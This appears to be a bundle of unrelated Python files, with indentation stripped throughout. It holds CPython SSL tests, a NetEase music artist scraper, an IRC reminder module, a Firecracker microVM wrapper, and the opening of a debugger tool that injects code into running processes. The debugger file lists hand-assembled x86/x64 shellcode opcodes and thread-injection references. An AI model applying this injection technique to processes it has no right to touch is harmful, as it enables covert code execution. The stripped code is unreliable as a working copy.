sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
            # SIGNED_CERTFILE2 (whose subject CN is 'fakehostname') was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1.0/0.0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_main(verbose=False):
if support.verbose:
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, SVN_PYTHON_ORG_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicTests, BasicSocketTests, SSLErrorTests]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
pa_wangyi_singer.py
|
# Scrape every artist/group name and profile link from NetEase Cloud Music (music.163.com)
import json
import gevent
import requests
import threading
from lxml import etree
def request_url(url):
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
}
response = requests.get(url, headers=headers)
content = response.content.decode('utf-8')
tree = etree.HTML(content)
return tree
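# Rough flow of this scraper: request_url() fetches and parses one page,
# worker() walks a single artist category across the initial-letter filters
# (ASCII codes 65-90, i.e. 'A'-'Z'), task() fans one block's categories out
# to gevent greenlets, and main() runs one thread per category block before
# dumping the shared `data` dict to wanyi_singer.json.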
def worker(singer_type, type_href):
url_root = 'https://music.163.com'
singer_list = []
    for j in range(65, 91):  # ASCII codes for 'A'..'Z', used as the initial-letter filter
singer_type_url_page = url_root + type_href + '&initial={}'.format(j)
singer_tree = request_url(singer_type_url_page)
singer_a_list = singer_tree.xpath(
'//ul[@id="m-artist-box"]/li//a[@class="nm nm-icn f-thide s-fc0"] | //ul[@id="m-artist-box"]/li[@class="sml"]/a')
for a in singer_a_list:
singer_info = {}
singer_info['url'] = url_root + a.xpath('./@href')[0].strip()
singer_info['name'] = None
if a.xpath('./text()'):
singer_info['name'] = a.xpath('./text()')[0].strip()
singer_list.append(singer_info)
data[singer_type] = singer_list
# print(data)
def task(singer_type_list, type_href_list):
gevent_list = []
for i in range(len(singer_type_list)):
g = gevent.spawn(worker, *(singer_type_list[i], type_href_list[i]))
gevent_list.append(g)
gevent.joinall(gevent_list)
def main(tree):
info_list = tree.xpath('//div[@class="blk"]')
threading_list = []
for info in info_list:
singer_type_list = info.xpath('.//a/text()')
type_href_list = info.xpath('.//a/@href')
t = threading.Thread(target=task, args=(singer_type_list, type_href_list))
threading_list.append(t)
t.start()
for t in threading_list:
t.join()
# json_str = json.dumps(data, ensure_ascii=False)
# with open('nsjjka.txt', mode='w', encoding='utf-8') as f:
# f.write(json_str)
with open('wanyi_singer.json', mode='w', encoding='utf-8') as fp:
json.dump(data, fp, ensure_ascii=False, indent=4)
if __name__ == '__main__':
data = {}
url = 'https://music.163.com/discover/artist'
tree = request_url(url)
main(tree)
|
remind.py
|
# coding=utf8
"""
remind.py - Willie Reminder Module
Copyright 2011, Sean B. Palmer, inamidst.com
Licensed under the Eiffel Forum License 2.
http://willie.dftba.net
"""
from __future__ import unicode_literals
import os
import re
import time
import threading
import collections
import codecs
from datetime import datetime
from willie.module import commands, example, NOLIMIT
import willie.tools
from willie.tools.time import get_timezone, format_time
try:
import pytz
except ImportError:
pytz = None
def filename(self):
name = self.nick + '-' + self.config.host + '.reminders.db'
return os.path.join(self.config.dotdir, name)
def load_database(name):
data = {}
if os.path.isfile(name):
f = codecs.open(name, 'r', encoding='utf-8')
for line in f:
unixtime, channel, nick, message = line.split('\t')
message = message.rstrip('\n')
            t = int(float(unixtime))  # stored timestamps may be float strings; coerce to whole seconds
reminder = (channel, nick, message)
try:
data[t].append(reminder)
except KeyError:
data[t] = [reminder]
f.close()
return data
def dump_database(name, data):
f = codecs.open(name, 'w', encoding='utf-8')
for unixtime, reminders in willie.tools.iteritems(data):
for channel, nick, message in reminders:
f.write('%s\t%s\t%s\t%s\n' % (unixtime, channel, nick, message))
f.close()
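# The reminder database is a plain UTF-8 text file, one reminder per line in
# the form "<unixtime>\t<channel>\t<nick>\t<message>", for example
# (illustrative): "1430000000\t#willie\tPalmer\tGo to class".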
def setup(bot):
bot.rfn = filename(bot)
bot.rdb = load_database(bot.rfn)
def monitor(bot):
time.sleep(5)
while True:
now = int(time.time())
unixtimes = [int(key) for key in bot.rdb]
oldtimes = [t for t in unixtimes if t <= now]
if oldtimes:
for oldtime in oldtimes:
for (channel, nick, message) in bot.rdb[oldtime]:
if message:
bot.msg(channel, nick + ': ' + message)
else:
bot.msg(channel, nick + '!')
del bot.rdb[oldtime]
dump_database(bot.rfn, bot.rdb)
time.sleep(2.5)
targs = (bot,)
t = threading.Thread(target=monitor, args=targs)
t.start()
scaling = collections.OrderedDict([
('years', 365.25 * 24 * 3600),
('year', 365.25 * 24 * 3600),
('yrs', 365.25 * 24 * 3600),
('y', 365.25 * 24 * 3600),
('months', 29.53059 * 24 * 3600),
('month', 29.53059 * 24 * 3600),
('mo', 29.53059 * 24 * 3600),
('weeks', 7 * 24 * 3600),
('week', 7 * 24 * 3600),
('wks', 7 * 24 * 3600),
('wk', 7 * 24 * 3600),
('w', 7 * 24 * 3600),
('days', 24 * 3600),
('day', 24 * 3600),
('d', 24 * 3600),
('hours', 3600),
('hour', 3600),
('hrs', 3600),
('hr', 3600),
('h', 3600),
('minutes', 60),
('minute', 60),
('mins', 60),
('min', 60),
('m', 60),
('seconds', 1),
('second', 1),
('secs', 1),
('sec', 1),
('s', 1),
])
periods = '|'.join(scaling.keys())
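# Worked example of the parsing done in remind() below (a sketch, not code that
# runs here): for ".in 3h45m Go to class" the split yields "3h" and "45m", each
# piece is matched as (length, unit), and the total duration is
# 3 * scaling['h'] + 45 * scaling['m'] == 3 * 3600 + 45 * 60 == 13500 seconds;
# the remaining text "Go to class" becomes the reminder message.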
@commands('in')
@example('.in 3h45m Go to class')
def remind(bot, trigger):
"""Gives you a reminder in the given amount of time."""
duration = 0
message = filter(None, re.split('(\d+(?:\.\d+)? ?(?:(?i)' + periods + ')) ?',
trigger.group(2))[1:])
reminder = ''
stop = False
for piece in message:
grp = re.match('(\d+(?:\.\d+)?) ?(.*) ?', piece)
if grp and not stop:
length = float(grp.group(1))
factor = scaling.get(grp.group(2).lower(), 60)
duration += length * factor
else:
reminder = reminder + piece
stop = True
if duration == 0:
return bot.reply("Sorry, didn't understand the input.")
if duration % 1:
duration = int(duration) + 1
else:
duration = int(duration)
timezone = get_timezone(
bot.db, bot.config, None, trigger.nick, trigger.sender)
create_reminder(bot, trigger, duration, reminder, timezone)
@commands('at')
@example('.at 13:47 Do your homework!')
def at(bot, trigger):
"""
Gives you a reminder at the given time. Takes hh:mm:ssTimezone
message. Timezone is any timezone Willie takes elsewhere; the best choices
are those from the tzdb; a list of valid options is available at
http://dft.ba/-tz . The seconds and timezone are optional.
"""
regex = re.compile(r'(\d+):(\d+)(?::(\d+))?([^\s\d]+)? (.*)')
match = regex.match(trigger.group(2))
if not match:
bot.reply("Sorry, but I didn't understand your input.")
return NOLIMIT
hour, minute, second, tz, message = match.groups()
if not second:
second = '0'
if pytz:
timezone = get_timezone(bot.db, bot.config, tz,
trigger.nick, trigger.sender)
if not timezone:
timezone = 'UTC'
now = datetime.now(pytz.timezone(timezone))
at_time = datetime(now.year, now.month, now.day,
int(hour), int(minute), int(second),
tzinfo=now.tzinfo)
timediff = at_time - now
else:
if tz and tz.upper() != 'UTC':
bot.reply("I don't have timzeone support installed.")
return NOLIMIT
now = datetime.now()
at_time = datetime(now.year, now.month, now.day,
int(hour), int(minute), int(second))
timediff = at_time - now
duration = timediff.seconds
if duration < 0:
duration += 86400
create_reminder(bot, trigger, duration, message, 'UTC')
def create_reminder(bot, trigger, duration, message, tz):
t = int(time.time()) + duration
reminder = (trigger.sender, trigger.nick, message)
try:
bot.rdb[t].append(reminder)
except KeyError:
bot.rdb[t] = [reminder]
dump_database(bot.rfn, bot.rdb)
if duration >= 60:
remind_at = datetime.utcfromtimestamp(t)
timef = format_time(bot.db, bot.config, tz, trigger.nick,
trigger.sender, remind_at)
bot.reply('Okay, will remind at %s' % timef)
else:
bot.reply('Okay, will remind in %s secs' % duration)
|
firecracker_microvm.py
|
import asyncio
import dataclasses
import logging
from dataclasses import dataclass, field
from enum import Enum
from multiprocessing import Process, set_start_method
from os import system
from os.path import isfile, exists
from typing import Optional, Dict, List
import msgpack
try:
    import psutil
except ImportError:
psutil = None
from aiohttp import ClientResponseError
from aleph_message.models import ProgramContent
from aleph_message.models.program import MachineResources, Encoding
from firecracker.config import (
BootSource,
Drive,
MachineConfig,
FirecrackerConfig,
Vsock,
NetworkInterface,
)
from firecracker.microvm import MicroVM, setfacl
from firecracker.models import FilePath
from guest_api.__main__ import run_guest_api
from ..conf import settings
from ..storage import get_code_path, get_runtime_path, get_data_path, get_volume_path
logger = logging.getLogger(__name__)
set_start_method("spawn")
def load_file_content(path: FilePath) -> bytes:
if path:
with open(path, "rb") as fd:
return fd.read()
else:
return b""
class ResourceDownloadError(ClientResponseError):
"""An error occurred while downloading a VM resource file"""
def __init__(self, error: ClientResponseError):
super().__init__(
request_info=error.request_info,
history=error.history,
status=error.status,
message=error.message,
headers=error.headers,
)
class Interface(str, Enum):
asgi = "asgi"
executable = "executable"
@dataclass
class Volume:
mount: str
device: str
read_only: bool
@dataclass
class HostVolume:
mount: str
path_on_host: str
read_only: bool
@dataclass
class ConfigurationPayload:
code: bytes
encoding: Encoding
entrypoint: str
input_data: bytes
interface: Interface
vm_hash: str
ip: Optional[str] = None
route: Optional[str] = None
dns_servers: List[str] = field(default_factory=list)
volumes: List[Volume] = field(default_factory=list)
variables: Optional[Dict[str, str]] = None
def as_msgpack(self) -> bytes:
return msgpack.dumps(dataclasses.asdict(self), use_bin_type=True)
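    # This payload is presumably what gets shipped to the guest's init process
    # (see AlephFirecrackerVM.configure() below), serialized with msgpack, so
    # the fields above need to stay msgpack-serializable types.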
@dataclass
class ConfigurationResponse:
success: bool
error: Optional[str] = None
traceback: Optional[str] = None
@dataclass
class RunCodePayload:
scope: Dict
def as_msgpack(self) -> bytes:
return msgpack.dumps(dataclasses.asdict(self), use_bin_type=True)
class AlephFirecrackerResources:
message_content: ProgramContent
kernel_image_path: FilePath
code_path: FilePath
code_encoding: Encoding
code_entrypoint: str
rootfs_path: FilePath
volumes: List[HostVolume]
volume_paths: Dict[str, FilePath]
data_path: Optional[FilePath]
namespace: str
def __init__(self, message_content: ProgramContent, namespace: str):
self.message_content = message_content
self.code_encoding = message_content.code.encoding
self.code_entrypoint = message_content.code.entrypoint
self.namespace = namespace
def to_dict(self):
return self.__dict__
async def download_kernel(self):
# Assumes kernel is already present on the host
self.kernel_image_path = settings.LINUX_PATH
assert isfile(self.kernel_image_path)
async def download_code(self):
code_ref: str = self.message_content.code.ref
try:
self.code_path = await get_code_path(code_ref)
except ClientResponseError as error:
raise ResourceDownloadError(error)
assert isfile(self.code_path)
async def download_runtime(self):
runtime_ref: str = self.message_content.runtime.ref
try:
self.rootfs_path = await get_runtime_path(runtime_ref)
except ClientResponseError as error:
raise ResourceDownloadError(error)
assert isfile(self.rootfs_path), f"Runtime not found on {self.rootfs_path}"
async def download_data(self):
if self.message_content.data:
data_ref: str = self.message_content.data.ref
try:
self.data_path = await get_data_path(data_ref)
except ClientResponseError as error:
raise ResourceDownloadError(error)
assert isfile(self.data_path)
else:
self.data_path = None
async def download_volumes(self):
volumes = []
# TODO: Download in parallel
for volume in self.message_content.volumes:
volumes.append(
HostVolume(
mount=volume.mount,
path_on_host=(
await get_volume_path(volume=volume, namespace=self.namespace)
),
read_only=volume.is_read_only(),
)
)
self.volumes = volumes
async def download_all(self):
await asyncio.gather(
self.download_kernel(),
self.download_code(),
self.download_runtime(),
self.download_volumes(),
self.download_data(),
)
class VmSetupError(Exception):
pass
class AlephFirecrackerVM:
vm_id: int
vm_hash: str
resources: AlephFirecrackerResources
enable_console: bool
enable_networking: bool
hardware_resources: MachineResources
fvm: MicroVM = None
guest_api_process: Optional[Process] = None
def __init__(
self,
vm_id: int,
vm_hash: str,
resources: AlephFirecrackerResources,
enable_networking: bool = False,
enable_console: Optional[bool] = None,
hardware_resources: MachineResources = MachineResources(),
):
self.vm_id = vm_id
self.vm_hash = vm_hash
self.resources = resources
self.enable_networking = enable_networking and settings.ALLOW_VM_NETWORKING
if enable_console is None:
enable_console = settings.PRINT_SYSTEM_LOGS
self.enable_console = enable_console
self.hardware_resources = hardware_resources
def to_dict(self):
if self.fvm.proc and psutil:
p = psutil.Process(self.fvm.proc.pid)
pid_info = {
"status": p.status(),
"create_time": p.create_time(),
"cpu_times": p.cpu_times(),
"cpu_percent": p.cpu_percent(),
"memory_info": p.memory_info(),
"io_counters": p.io_counters(),
"open_files": p.open_files(),
"connections": p.connections(),
"num_threads": p.num_threads(),
"num_ctx_switches": p.num_ctx_switches(),
}
else:
pid_info = None
return {
"process": pid_info,
**self.__dict__,
}
async def setup(self):
logger.debug("setup started")
await setfacl()
fvm = MicroVM(
vm_id=self.vm_id,
firecracker_bin_path=settings.FIRECRACKER_PATH,
use_jailer=settings.USE_JAILER,
jailer_bin_path=settings.JAILER_PATH,
init_timeout=settings.INIT_TIMEOUT,
)
fvm.prepare_jailer()
config = FirecrackerConfig(
boot_source=BootSource(
kernel_image_path=FilePath(
fvm.enable_kernel(self.resources.kernel_image_path)
),
boot_args=BootSource.args(enable_console=self.enable_console),
),
drives=[
Drive(
drive_id="rootfs",
path_on_host=FilePath(
fvm.enable_rootfs(self.resources.rootfs_path)
),
is_root_device=True,
is_read_only=True,
),
]
+ (
[fvm.enable_drive(self.resources.code_path)]
if self.resources.code_encoding == Encoding.squashfs
else []
)
+ [
fvm.enable_drive(volume.path_on_host, read_only=volume.read_only)
for volume in self.resources.volumes
],
machine_config=MachineConfig(
vcpu_count=self.hardware_resources.vcpus,
mem_size_mib=self.hardware_resources.memory,
),
vsock=Vsock(),
network_interfaces=[
NetworkInterface(
iface_id="eth0",
host_dev_name=await fvm.create_network_interface(
interface=settings.NETWORK_INTERFACE),
)
]
if self.enable_networking
else [],
)
logger.debug(config.json(by_alias=True, exclude_none=True, indent=4))
try:
await fvm.start(config)
logger.debug("setup done")
self.fvm = fvm
except Exception:
await fvm.teardown()
raise
async def start(self):
logger.debug(f"starting vm {self.vm_id}")
if not self.fvm:
raise ValueError("No VM found. Call setup() before start()")
fvm = self.fvm
if self.enable_console:
fvm.start_printing_logs()
await fvm.wait_for_init()
logger.debug(f"started fvm {self.vm_id}")
async def configure(self):
"""Configure the VM by sending configuration info to it's init"""
input_data: bytes = load_file_content(self.resources.data_path)
interface = (
Interface.asgi
if ":" in self.resources.code_entrypoint
else Interface.executable
)
volumes: List[Volume]
if self.resources.code_encoding == Encoding.squashfs:
code = b""
volumes = [Volume(mount="/opt/code", device="vdb", read_only=True)] + [
Volume(
mount=volume.mount,
device=self.fvm.drives[index + 1].drive_id,
read_only=volume.read_only,
)
for index, volume in enumerate(self.resources.volumes)
]
else:
code: bytes = load_file_content(self.resources.code_path)
volumes = [
Volume(
mount=volume.mount,
device=self.fvm.drives[index].drive_id,
read_only=volume.read_only,
)
for index, volume in enumerate(self.resources.volumes)
]
reader, writer = await asyncio.open_unix_connection(path=self.fvm.vsock_path)
config = ConfigurationPayload(
ip=self.fvm.guest_ip if self.enable_networking else None,
            route=self.fvm.host_ip if self.enable_networking else None,
dns_servers=settings.DNS_NAMESERVERS,
code=code,
encoding=self.resources.code_encoding,
entrypoint=self.resources.code_entrypoint,
input_data=input_data,
interface=interface,
vm_hash=self.vm_hash,
volumes=volumes,
variables=self.resources.message_content.variables,
)
payload = config.as_msgpack()
length = f"{len(payload)}\n".encode()
writer.write(b"CONNECT 52\n" + length + payload)
await writer.drain()
await reader.readline() # Ignore the acknowledgement from the socket
response_raw = await reader.read(1000_000)
response = ConfigurationResponse(**msgpack.loads(response_raw, raw=False))
if response.success is False:
logger.exception(response.traceback)
raise VmSetupError(response.error)
async def start_guest_api(self):
logger.debug(f"starting guest API for {self.vm_id}")
vsock_path = f"{self.fvm.vsock_path}_53"
vm_hash = self.vm_hash
self.guest_api_process = Process(
target=run_guest_api, args=(vsock_path, vm_hash)
)
self.guest_api_process.start()
while not exists(vsock_path):
await asyncio.sleep(0.01)
system(f"chown jailman:jailman {vsock_path}")
logger.debug(f"started guest API for {self.vm_id}")
async def stop_guest_api(self):
if self.guest_api_process:
self.guest_api_process.terminate()
async def teardown(self):
if self.fvm:
await self.fvm.teardown()
await self.stop_guest_api()
    async def run_code(
        self,
        scope: Optional[dict] = None,
    ):
logger.debug("running code")
scope = scope or {}
reader, writer = await asyncio.open_unix_connection(path=self.fvm.vsock_path)
payload = RunCodePayload(scope=scope)
writer.write(b"CONNECT 52\n" + payload.as_msgpack())
await writer.drain()
ack: bytes = await reader.readline()
logger.debug(f"ack={ack.decode()}")
logger.debug("waiting for VM response")
response: bytes = await reader.read()
logger.debug("cleaning VM resources")
writer.close()
await writer.wait_closed()
return response
|
add_code_to_python_process.py
|
r'''
Copyright: Brainwy Software Ltda.
License: EPL.
=============
Works for Windows relying on a fork of winappdbg which works in py2/3 (at least for the part we're interested in).
See: https://github.com/fabioz/winappdbg (py3 branch).
Note that the official branch for winappdbg is: https://github.com/MarioVilas/winappdbg, which should be used when it works in Py3.
A private copy is added here to make deployment easier, but changes should always be done upstream first.
Works for Linux relying on gdb.
Limitations:
============
Linux:
------
1. It is possible that ptrace is disabled: /etc/sysctl.d/10-ptrace.conf
Note that even enabling it in /etc/sysctl.d/10-ptrace.conf (i.e.: making the
ptrace_scope=0), it's possible that we need to run the application that'll use ptrace (or
gdb in this case) as root (so, we must sudo the python which'll run this module).
2. It currently doesn't work in debug builds (i.e.: python_d)
Other implementations:
- pyrasite.com:
GPL
Windows/linux (in Linux it also uses gdb to connect -- although specifics are different as we use a dll to execute
code with other threads stopped). Its Windows approach is more limited because it doesn't seem to deal properly with
Python 3 if threading is disabled.
- https://github.com/google/pyringe:
Apache v2.
Only linux/Python 2.
- http://pytools.codeplex.com:
Apache V2
Windows Only (but supports mixed mode debugging)
Our own code relies heavily on a part of it: http://pytools.codeplex.com/SourceControl/latest#Python/Product/PyDebugAttach/PyDebugAttach.cpp
to overcome some limitations of attaching and running code in the target python executable on Python 3.
See: attach.cpp
Linux: References if we wanted to use a pure-python debugger:
https://bitbucket.org/haypo/python-ptrace/
http://stackoverflow.com/questions/7841573/how-to-get-an-error-message-for-errno-value-in-python
Jugaad:
https://www.defcon.org/images/defcon-19/dc-19-presentations/Jakhar/DEFCON-19-Jakhar-Jugaad-Linux-Thread-Injection.pdf
https://github.com/aseemjakhar/jugaad
Something else (general and not Python related):
- http://www.codeproject.com/Articles/4610/Three-Ways-to-Inject-Your-Code-into-Another-Proces
Other references:
- https://github.com/haypo/faulthandler
- http://nedbatchelder.com/text/trace-function.html
- https://github.com/python-git/python/blob/master/Python/sysmodule.c (sys_settrace)
- https://github.com/python-git/python/blob/master/Python/ceval.c (PyEval_SetTrace)
- https://github.com/python-git/python/blob/master/Python/thread.c (PyThread_get_key_value)
To build the dlls needed on windows, visual studio express 13 was used (see compile_dll.bat)
See: attach_pydevd.py to attach the pydev debugger to a running python process.
'''
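# Typical usage (see main() below): python add_code_to_python_process.py <pid> "<python code to run>"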
# Note: to work with nasm compiling asm to code and decompiling to see asm with shellcode:
# x:\nasm\nasm-2.07-win32\nasm-2.07\nasm.exe
# nasm.asm&x:\nasm\nasm-2.07-win32\nasm-2.07\ndisasm.exe -b arch nasm
import ctypes
import os
import struct
import subprocess
import sys
import time
SHOW_DEBUG_INFO = 0
def stderr_write(message):
sys.stderr.write(message)
sys.stderr.write("\n")
def debug(message):
if SHOW_DEBUG_INFO > 0:
stderr_write(message)
class AutoExit(object):
def __init__(self, on_exit):
self.on_exit = on_exit
def __enter__(self):
pass
def __exit__(self, *args):
self.on_exit()
class GenShellCodeHelper(object):
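    """Helper that builds tiny shellcode sequences from a fixed table of
    pre-assembled x86 / x86-64 instruction encodings (no assembler needed at runtime)."""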
def __init__(self, is_64):
from winappdbg import compat
self.is_64 = is_64
self._code = []
if not is_64:
self._translations = {
'push esi': compat.b('\x56'),
'push eax': compat.b('\x50'),
'push ebp': compat.b('\x55'),
'push ebx': compat.b('\x53'),
'pop esi': compat.b('\x5E'),
'pop eax': compat.b('\x58'),
'pop ebp': compat.b('\x5D'),
'pop ebx': compat.b('\x5B'),
'mov esi': compat.b('\xBE'),
'mov eax': compat.b('\xB8'),
'mov ebp': compat.b('\xBD'),
'mov ebx': compat.b('\xBB'),
'call ebp': compat.b('\xFF\xD5'),
'call eax': compat.b('\xFF\xD0'),
'call ebx': compat.b('\xFF\xD3'),
'mov ebx,eax': compat.b('\x89\xC3'),
'mov eax,ebx': compat.b('\x89\xD8'),
'mov ebp,esp': compat.b('\x89\xE5'),
'mov esp,ebp': compat.b('\x89\xEC'),
'push dword': compat.b('\x68'),
'mov ebp,eax': compat.b('\x89\xC5'),
'mov eax,ebp': compat.b('\x89\xE8'),
'ret': compat.b('\xc3'),
}
else:
# Translate 64 bits
self._translations = {
'push rsi': compat.b('\x56'),
'push rax': compat.b('\x50'),
'push rbp': compat.b('\x55'),
'push rbx': compat.b('\x53'),
'push rsp': compat.b('\x54'),
